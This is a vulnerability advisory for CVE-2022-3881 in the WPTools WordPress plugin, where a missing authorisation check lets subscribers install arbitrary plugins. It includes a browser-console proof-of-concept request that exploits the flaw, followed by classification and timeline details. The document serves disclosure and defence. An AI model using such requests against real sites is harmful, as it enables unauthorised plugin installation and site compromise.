WPTools < 3.43 – Subscriber+ Arbitrary Plugin Installation | CVE 2022-3881 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wptools_install_plugin&slug=classic-editor',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Fixed in 3.43

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

c2a9cf01-051a-429a-82ca-280885114b5a

Timeline

Publicly Published

2022-11-21 (about 1 years ago)

Added

2022-11-21 (about 1 years ago)

Last Updated

2022-11-21 (about 1 years ago)

Other

Published

Title

Published

2023-11-28

Title

SchedulePress < 5.0.5 - Contributor+ Arbitrary Post Update/Deletion

Published

2023-04-26

Title

WooCommerce Multivendor Marketplace – REST API < 1.6.0 - Subscriber+ Arbitrary Orders Item And Notes Update

Published

2024-04-25

Title

WP Masquerade <= 1.1.0 - Subscriber+ Account Takeover

Published

2024-05-08

Title

Swift Performance Lite <= 2.3.6.18 - Incorrect Authorization to Authenticated (Subscriber+) Settings Modification

Published

2021-10-04

Title

Logo Slider and Showcase < 1.3.37 - Editor Plugin's Settings Update